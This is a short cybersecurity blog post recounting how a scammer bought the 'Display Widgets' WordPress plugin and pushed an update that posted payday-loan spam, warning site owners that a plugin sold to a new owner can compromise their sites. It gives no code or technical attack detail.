An Interesting New Twist on WordPress Site Hijacking

This story reads like fiction.  OK, not great fiction, but this story illustrates another way that WordPress websites can be hijacked and used to promote a cyber scam.

WordPress websites are often hijacked so a phisher can host their landing page on a site that does not lead back to them.  And WordPress sites can be interesting targets for other cyber-criminals who export the user name and password database for cracking and sale on the Dark Web.

In this case, the cyber scammer actually paid $15,000 to the developer of a popular WordPress plugin “Display Widgets.”  After modifying the plugin code, he pushed an update to WordPress sites using the plugin.  The new code posted spam messages promoting a payday loan business that he also owned.

This guy had already purchased and modified other plugins from other developers including the “404 to 301” plugin.  The full story is available on the WordFence blog, and I encourage you to click over for a read.

The important take-away here is that even if you are doing everything possible to secure your website, it can be compromised as the result of another person’s business decision to sell their software to another company.

More information:


About the Author:

Cybersecurity guru to business owners in the St Paul, Minneapolis, and western Wisconsin area. Computer security and hacking have been a passion of mine since I entered the computer and networking business in 2000. In 2013 I completed a course of study and certification exam to become a Certified Ethical Hacker (CEH). In 2016 I was certified as a Certified Information Systems Security Professional (CISSP). As Cybersecurity Analyst at The WyzCo Group, I help our clients experience high levels of computer security, network security, and web site security. In addition to consulting on security products and services, we also conduct security audits, vulnerability assessments and full penetration tests. We also provide Cybersecurity Awareness Training for clients and their employees. We also work with companies and organizations that need to certify compliance with regulations such as PCI-DSS (credit card processing), HIPAA/HITECH (medical records), and GLBA. The views expressed on this Web site are mine alone and do not necessarily represent the views of my employer.

Add a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.